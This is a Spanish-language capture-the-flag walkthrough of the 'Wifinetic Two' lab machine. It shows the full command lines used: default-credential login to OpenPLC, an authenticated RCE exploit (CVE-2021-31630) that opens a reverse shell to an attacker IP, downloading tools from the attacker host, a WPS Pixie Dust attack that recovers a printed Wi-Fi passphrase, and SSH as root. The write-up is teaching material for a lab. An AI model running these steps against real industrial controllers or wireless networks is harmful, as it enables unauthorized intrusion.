Wifinetic Two

OS: Linux
Dificultad: Medio
Puntos: 30

Nmap

nmap -v -p 22,8080 -sV -sC -oN nmap.txt 10.10.11.7

Nmap scan report for 10.10.11.7
Host is up (0.100s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy Werkzeug/1.0.1 Python/2.7.18
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login

Enumeration

El puerto 8080 muestra una aplicacion llamada openPLC con un panel de login.

Se puede acceder con credenciales por default openplc : openplc como se muestra en la imagen.

OpenPLC WebServer v3 - Authenticated RCE

Buscando la forma de obtener RCE encontramos el siguiente script con el que podemos obtener una reverse shell.

python3 cve_2021_31630.py http://10.10.11.7:8080 -u openplc -p openplc -lh 10.10.14.89 -lp 1234

Privilege Escalation

El contenedor cuenta con una interfaz de red extra wlan0.

root@attica02:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.3.3  netmask 255.255.255.0  broadcast 10.0.3.255
        inet6 fe80::216:3eff:fefb:30c8  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:fb:30:c8  txqueuelen 1000  (Ethernet)
        RX packets 22858  bytes 2615654 (2.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 14063  bytes 5130529 (5.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 341  bytes 19415 (19.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 341  bytes 19415 (19.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 02:00:00:00:03:00  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Enumerando esa interfaz nos percatamos que tiene habilidato WPS.

root@attica02:/tmp# iw dev wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
        last seen: 15088.152s [boottime]
        TSF: 1712736744946339 usec (19823d, 08:12:24)
        freq: 2412
        beacon interval: 100 TUs
        capability: ESS Privacy ShortSlotTime (0x0411)
        signal: -30.00 dBm
        last seen: 0 ms ago
        Information elements from Probe Response frame:
        SSID: plcrouter
        Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 
        DS Parameter set: channel 1
        ERP: Barker_Preamble_Mode
        Extended supported rates: 24.0 36.0 48.0 54.0 
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: PSK
                 * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
        Supported operating classes:
                 * current operating class: 81
        Extended capabilities:
                 * Extended Channel Switching
                 * SSID List
                 * Operating Mode Notification
        WPS:     * Version: 1.0
                 * Wi-Fi Protected Setup State: 2 (Configured)
                 * Response Type: 3 (AP)
                 * UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
                 * Manufacturer:  
                 * Model:  
                 * Model Number:  
                 * Serial Number:  
                 * Primary Device Type: 0-00000000-0
                 * Device name:  
                 * Config methods: Label, Display, Keypad
                 * Version2: 2.0

WPS Pixie Dust attack

Investigando ataques sobre WPS podemos ayudarnos del siguiente recurso HackTricks Wifi.

Nos enviamos los archivos para compilar el programa.

root@attica02:/tmp# curl 10.10.14.89/Makefile -o Makefile
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    82  100    82    0     0    403      0 --:--:-- --:--:-- --:--:--   403
root@attica02:/tmp# curl 10.10.14.89/oneshot.c -o oneshot.c
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 40390  100 40390    0     0  99332      0 --:--:-- --:--:-- --:--:-- 99238

Ejecutamos el comando:

make

Una vez compliado ejecutamos el siguiente comando para obtener el PIN, password y AP name.

./oneshot -i wlan0 -K -b 02:00:00:00:01:00

Set up Network Interface

Investigando sobre como utilizar lo obtenido llegamos a este Post y tambien a este Blog

Para configurar la interfaz de red con la informacion que tenemos primero generamos el archivo de configuracion.

wpa_passphrase plcrouter 'NoWWEDoKnowWhaTisReal123!' > wpa.conf

root@attica02:/tmp# cat wpa.conf
network={
        ssid="plcrouter"
        #psk="NoWWEDoKnowWhaTisReal123!"
        psk=2bafe4e17630ef1834eaa9fa5c4d81fa5ef093c4db5aac5c03f1643fef02d156
}

Ahora utilizaremos wpa_supplicant para conectarnos a la interfaz de red.

wpa_supplicant -B -i wlan0 -c wpa.conf

Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information
nl80211: Could not set interface 'p2p-dev-wlan0' UP
nl80211: deinit ifname=p2p-dev-wlan0 disabled_11b_rates=0
p2p-dev-wlan0: Failed to initialize driver interface
p2p-dev-wlan0: CTRL-EVENT-DSCP-POLICY clear_all
P2P: Failed to enable P2P Device interface

Por ultimo es necesario establecerle una IP. En este caso no es posible utilizar dhclient ya que se queda pasmada la terminal por lo tanto configuraremos la ip manualmente, utilizaremos la IP por default 192.168.1.0/24.

root@attica02:/tmp# ifconfig wlan0 192.168.1.2 netmask 255.255.255.0
root@attica02:/tmp# ifconfig                                        
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.3.3  netmask 255.255.255.0  broadcast 10.0.3.255
        inet6 fe80::216:3eff:fefb:30c8  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:fb:30:c8  txqueuelen 1000  (Ethernet)
        RX packets 25980  bytes 2871629 (2.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 15839  bytes 5291157 (5.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 351  bytes 20143 (20.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 351  bytes 20143 (20.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.2  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::ff:fe00:300  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:03:00  txqueuelen 1000  (Ethernet)
        RX packets 8  bytes 1245 (1.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 80  bytes 7844 (7.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Ahora nos conectamos por SSH.

ssh root@192.168.1.1